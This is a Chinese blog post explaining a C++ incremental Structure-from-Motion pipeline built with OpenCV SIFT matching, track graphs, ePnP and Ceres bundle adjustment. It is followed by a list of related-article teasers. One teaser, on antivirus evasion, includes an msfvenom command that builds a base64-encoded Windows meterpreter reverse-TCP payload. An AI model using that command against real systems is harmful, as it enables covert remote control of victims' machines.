【三维重建】增量SFM系统
在学习完鲁鹏老师的三维重建基础后,打算用C++代码复现一下增量SFM系统(https://github.com/ldx-star/SFM)。
本项目的最终目标就是通过相机拍摄的多视角视图获取三维点云。由于资金有效,博主使用的是相机是小米12。
先来看一下最终效果:

当然了,和开源系统比起来还是差很多的。

二、项目流程
整个项目大致可以分为三步:
- 相机标定
- 构建共视图
- 重建
接下来将逐步介绍这三个流程,以及其实现细节。
三、实现细节
手机相机的焦距一般是固定,我们在使用手机拍照时说的调焦其实是算法调焦。为什么避免这个问题,在用手机拍摄标定板时需要关闭手机的自动调焦。
以小米手机为例:

我们直接使用opencv提供的方法进行标定,如何想了解具体实现细节与源码可以参考博文 相机标定原理
我们项目的提供的标定图,最终的重投影误差为0.25,并且我们拍摄图片所使用的是同一个相机,所以所有相机的初始内参全部一样。
2、构建共视图
共视图就是建立图与图间的特征匹配关系。
这部分使用的事opencv的SIFT特征匹配算法,详细原理见博文 SIFT特征检测
在共视图中,我们定义了以下结构:
struct Edge{bool flag;std::vector<cv::DMatch> matches;
};
struct Node{cv::Mat img;std::vector<cv::KeyPoint> keyPoints; // 特征点cv::Mat descriptors; // 特征描述符std::vector<Edge> edges; // 当前图与其他图的匹配关系std::vector<int> trick_id;
};
class CommonView{std::vector<Node> _graph;std::vector<cv::Mat> _images;std::vector<std::list<std::pair<int,int>>> _tracks;
}
std::vector<cv::Mat> _images:用于存放8副原始视图。
std::vector<Node> _graph:用两个视图间的匹配关系,构建一个图结构
std::vector<std::list<std::pair<int,int>>> _tracks: 用于存放track
-
什么是track?

如图所示, i m a g e k − 1 image_{k-1} imagek−1视图中的 P ( j , k − 1 ) P_{(j,k-1)} P(j,k−1) 与$ image_{k} 视图中的 视图中的 视图中的P_{(j,k)}$ 是一对儿匹配点, i m a g e k image_{k} imagek视图中的 P ( j , k ) P_{(j,k)} P(j,k) 与 i m a g e k + 1 image_{k+1} imagek+1视图中的 P ( j , k + 1 ) P_{(j,k+1)} P(j,k+1)是一对儿匹配点,这三个点表示的是显示同一个三维点,我们将这样的点集称为一个track,由三个点组成的点集就称track的值为3。为了使重建结果稳定,需要将track值小于2的匹配点去掉 。一个track对应一个三维点。 -
std::vector<std::list<std::pair<int,int>>>:这个结构是什么意思?
std::list<std::pair<int,int>>:表示一个track的数据结构,std::pair<int,int>:表示的某一个视图的二维坐标,pair.first表示的是视图id,pair.second表示的是特征点id。
Node结构体
std::vector<cv::KeyPoint> keyPoints:用于存放特征点
cv::Mat descriptors:当前视图的特征描述符
std::vector<Edge> edges:当前图与其他图的匹配关系,例如 edges[2]就表示当前视图与视图2的匹配关系。
std::vector<int> trick_id: trick_id.size()==keyPoints.size()用于表示每个特征点属于哪一个track
Edge结构体
bool flag:用一个布尔值表示两幅视图是否可以用于重建,初始值设为true,在两个视图进行重建后将其设为false
std::vector<cv::DMatch>:表示两视图的匹配关系

3、重建
- 选取可用匹配点最多的两个视图,得到初始的重建结果(初始重建结果至关重要,会直接影响到整个重建效果)
-
初始重建步骤:
-
计算基础矩阵(博文链接:对极几何)
-
从基础矩阵中得到相机外参(博文链接:运动恢复结构)
-
三角化,得到初始三维点(博文链接:三角化)
-
while(存在可以重建的视图)
- 从剩余视图中选取与已重建点交集最多的点,通过ePnP求得相机外参(博文链接:ePnP)
- 三角化
- 利用已重建的三维点进行捆绑调整,最小化重投影误差(博文链接:捆绑调整),这部分我们是调用Ceres库
-
四、结果

相关文章:
【三维重建】增量SFM系统
在学习完鲁鹏老师的三维重建基础后,打算用C代码复现一下增量SFM系统(https://github.com/ldx-star/SFM)。 本项目的最终目标就是通过相机拍摄的多视角视图获取三维点云。由于资金有效,博主使用的是相机是小米12。 先来看一下最终…...
PyTorch 维度变换-Tensor基本操作
以如下 tensor a 为例,展示常用的维度变换操作 >>> a torch.rand(4,3,28,28) >>> a.shape torch.Size([4, 3, 28, 28])view / reshape 两者功能完全相同: a.view(shape) >>> a.view(4,3,28*28) ## a.view(4,3,28,28) 可恢复squeeze…...
spring 事务失效的几种场景
一、背景 在 springBoot 开发过程中,我们一般都是在业务方法上添加 Transactional 注解来让 spring 替我们管理事务,但在某些特定的场景下,添加完注解之后,事务是不生效的,接下来详细介绍下。 二、方法不是 public 2…...
45岁程序员独白:中年打工人出路在哪里?
作为一名也是JAVA方向的互联网从业者,我发现周围超过40岁以上的同事,基本都是部门负责人或者高层,真正还在一线做开发或者当个小领导的,已经是凤毛麟角了。 同事A今年刚满40,育有一儿一女,从进入公司到现在…...
深度探讨:为何训练精度不高却在测试中表现优异?
深度探讨:为何训练精度不高却在测试中表现优异? 在深度学习领域,我们经常遇到这样一个看似矛盾的现象:模型在训练集上的精度不是特别高,但在测试集上却能达到出色的表现。这种情况虽然不是常规,但其背后的…...
动态内存管理<C语言>
导言 在C语言学习阶段,指针、结构体和动态内存管理,是后期学习数据结构的最重要的三大知识模块,也是C语言比较难的知识模块,但是“天下无难事”,只要认真踏实的学习,也能解决,所以下文将介绍动态…...
第一百零二节 Java面向对象设计 - Java静态内部类
Java面向对象设计 - Java静态内部类 静态成员类不是内部类 在另一个类的主体中定义的成员类可以声明为静态。 例子 以下代码声明了顶级类A和静态成员类B: class A {// Static member classpublic static class B {// Body for class B goes here} }注意 静态成…...
给自己Linux搞个『回收站』,防止文件误删除
linux没有像windows里一样的回收站,工作时候删除文件容易不小心删错,造成麻烦的后果。所以给自己整了个回收站: 文件删除,新建~/opts/move_to_trash.sh,然后在里面新增,将${your_name}改成你的用户名。同时…...
Springboot接收参数的21种方式
前言 最近一直在忙着开发项目(ps:其实有些摆烂),好久没有更新博客了,打开csdn一看好多网友留言私信,继上篇博客(我是如何实现HttpGet请求传body参数的!),网友议论纷纷,各抒起见。今天正好抽出时间总结一下Springboot接受参数的21种方式(Post、Get、Delete),一并…...
打造出色开发者体验的十大原则
大约十年前我是一名CIO,当时我在评估一种技术解决方案,向潜在供应商的代表讲明了我们的主要需求。他展示了该公司的至少三款产品。每种工具都有各自的用户体验、开发方法和学习要求,但是解决我们的业务需求同时需要这三种工具。作为CIO&#…...
Vue3_对接腾讯云COS_大文件分片上传和下载
目录 一、腾讯云后台配置 二、安装SDK 1.script 引入方式 2.webpack 引入方式 三、文件上传 1.new COS 实例 2.上传文件 四、文件下载 腾讯云官方文档: 腾讯云官方文档https://cloud.tencent.com/document/product/436/11459 一、腾讯云后台配置 1.登录 对…...
python免杀--base64加密(GG)
单层加密都GG~ 目录 cs生成个python的payload 将shellcode进行base64编码 执行上线代码 cs生成个python的payload msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhostIP lport6688 -f c cs生成c的也行. 将shellcode进行base64编码 import base64code …...
Python版与Java版城市天气信息爬取对比分析
在对比Python版和Java版城市天气信息爬取时,我们需要考虑多个方面,包括语言特性、库支持、代码简洁性、执行效率以及维护成本等。以下是对这两个版本进行的一些对比分析: 1. 语言特性 Python: 易于学习:Python的语法清…...
CSS真题合集(二)
CSS真题合集(二) 11. css3新增特性12. css3动画12.1 关键帧动画 (keyframes)12.2 animation12.3 transition12.4 transform 13. grid网格布局13.1 使用display: grid或display: inline-grid的HTML元素。13.2 定义网格13.3 13.4 自动填充和自动放置13.4 对…...
长期出汗困扰你?可能是肾合出了问题
想象一下,我们的身体是一座繁茂的秘密花园,每一寸肌肤、每一个细胞都是花园里的一朵花、一片叶。汗水,则是这花园中无声的语言,它讲述着我们的健康与否,也揭示着身体内部的微妙变化。 在炎炎夏日,身体如盛开…...
Jmeter函数二次开发说明
jmeter 二次开发使用 jmeter二次开发实现方法 使用maven依賴进行开发 导入jmeter的maven依赖,需要和你使用的jmeter版本一致。 <!-- https://mvnrepository.com/artifact/org.apache.jmeter/ApacheJMeter_core --> <dependency><groupId>org.ap…...
重新学习STM32(1)GPIO
概念简介 GPIO 是通用输入输出端口的简称,简单来说就是 STM32 可控制的引脚。STM32 芯片通过 GPIO 引脚与外部设备连接起来,从而实现与外部通讯、控制以及数据采集的功能。 GPIO被分成很多组,比如 GPIOA和GPIOB等。所有的 GPIO引脚都有基本的…...
React+TS前台项目实战(二)-- 路由配置 + 组件懒加载 + Error Boundary使用
文章目录 前言一、路由配置和懒加载lazy的使用二、TS版本Error Boundary组件封装三、在layout组件中使用Suspense组件和错误边界组件总结 前言 本文将详细介绍项目中的页面路由配置和异步组件懒加载处理,以提高用户体验,实现过渡效果。 一、路由配置和懒…...
成为电商低价神秘顾客访问员的必备条件(深圳神秘顾客公司)
电商低价神秘顾客需要具备以下条件,以确保能够执行有效的调查任务并为企业提供有价值的反馈: 1、细致的观察能力:神秘顾客访问员需要具备细致的观察能力,能够全面、细致地观察电商平台的购物流程、商品详情、服务细节等。这包括注…...
现货黄金交易多少克一手?国内外情况大不同
如果大家想参与国际市场上的现货黄金交易,就应该从它交易细则的入手,先彻底认识这个品种,因为它是来自欧美市场的投资方式,所以无论是从合约的计的单位,计价的货币,交易的具体时间,以及买卖过程…...
rknn优化教程(二)
文章目录 1. 前述2. 三方库的封装2.1 xrepo中的库2.2 xrepo之外的库2.2.1 opencv2.2.2 rknnrt2.2.3 spdlog 3. rknn_engine库 1. 前述 OK,开始写第二篇的内容了。这篇博客主要能写一下: 如何给一些三方库按照xmake方式进行封装,供调用如何按…...
【WiFi帧结构】
文章目录 帧结构MAC头部管理帧 帧结构 Wi-Fi的帧分为三部分组成:MAC头部frame bodyFCS,其中MAC是固定格式的,frame body是可变长度。 MAC头部有frame control,duration,address1,address2,addre…...
MongoDB学习和应用(高效的非关系型数据库)
一丶 MongoDB简介 对于社交类软件的功能,我们需要对它的功能特点进行分析: 数据量会随着用户数增大而增大读多写少价值较低非好友看不到其动态信息地理位置的查询… 针对以上特点进行分析各大存储工具: mysql:关系型数据库&am…...
基于Flask实现的医疗保险欺诈识别监测模型
基于Flask实现的医疗保险欺诈识别监测模型 项目截图 项目简介 社会医疗保险是国家通过立法形式强制实施,由雇主和个人按一定比例缴纳保险费,建立社会医疗保险基金,支付雇员医疗费用的一种医疗保险制度, 它是促进社会文明和进步的…...
【Redis技术进阶之路】「原理分析系列开篇」分析客户端和服务端网络诵信交互实现(服务端执行命令请求的过程 - 初始化服务器)
服务端执行命令请求的过程 【专栏简介】【技术大纲】【专栏目标】【目标人群】1. Redis爱好者与社区成员2. 后端开发和系统架构师3. 计算机专业的本科生及研究生 初始化服务器1. 初始化服务器状态结构初始化RedisServer变量 2. 加载相关系统配置和用户配置参数定制化配置参数案…...
【大模型RAG】Docker 一键部署 Milvus 完整攻略
本文概要 Milvus 2.5 Stand-alone 版可通过 Docker 在几分钟内完成安装;只需暴露 19530(gRPC)与 9091(HTTP/WebUI)两个端口,即可让本地电脑通过 PyMilvus 或浏览器访问远程 Linux 服务器上的 Milvus。下面…...
根据万维钢·精英日课6的内容,使用AI(2025)可以参考以下方法:
根据万维钢精英日课6的内容,使用AI(2025)可以参考以下方法: 四个洞见 模型已经比人聪明:以ChatGPT o3为代表的AI非常强大,能运用高级理论解释道理、引用最新学术论文,生成对顶尖科学家都有用的…...
蓝桥杯3498 01串的熵
问题描述 对于一个长度为 23333333的 01 串, 如果其信息熵为 11625907.5798, 且 0 出现次数比 1 少, 那么这个 01 串中 0 出现了多少次? #include<iostream> #include<cmath> using namespace std;int n 23333333;int main() {//枚举 0 出现的次数//因…...
Python基于历史模拟方法实现投资组合风险管理的VaR与ES模型项目实战
说明:这是一个机器学习实战项目(附带数据代码文档),如需数据代码文档可以直接到文章最后关注获取。 1.项目背景 在金融市场日益复杂和波动加剧的背景下,风险管理成为金融机构和个人投资者关注的核心议题之一。VaR&…...
OD 算法题 B卷【正整数到Excel编号之间的转换】
文章目录 正整数到Excel编号之间的转换 正整数到Excel编号之间的转换 excel的列编号是这样的:a b c … z aa ab ac… az ba bb bc…yz za zb zc …zz aaa aab aac…; 分别代表以下的编号1 2 3 … 26 27 28 29… 52 53 54 55… 676 677 678 679 … 702 703 704 705;…...
